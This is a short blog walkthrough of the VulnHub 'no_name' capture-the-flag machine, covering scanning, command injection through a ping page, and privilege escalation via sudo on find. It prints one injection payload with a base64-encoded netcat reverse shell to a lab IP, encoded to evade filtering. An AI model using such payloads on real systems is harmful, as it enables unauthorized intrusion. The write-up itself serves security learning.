Persecure : my learning archive

,

hacklabs: no_name CTF

https://www.vulnhub.com/entry/haclabs-no_name,429/

Run a nmap scan to find for open ports.

Run a gobuster scan to find for hidden directories.

index.php
admin
superadmin.php
A real ping page
Able to pipe commands
Unable to pipe the above mentioned commands.

Since we are unable to send nc commands , let’s encode it in base64.

Let’s send the encoded nc payload.

ping 127.0.0.1 | echo "bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTguMiA0NDM=" | base64 -d

Start a nc listener and a shell will be gained once the query is sent.

In the home directory of the yash user we found the first flag which contains a clue.

In the haclabs directory there is the second flag.

Use the find command to find for hidden files.

Password found.

Upgrade the python shell and switch user to haclabs.

Able to run sudo with find command.

Head to GTFO bins to find for an exploit.

Root gained.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

Comments (

0

)

%d bloggers like this: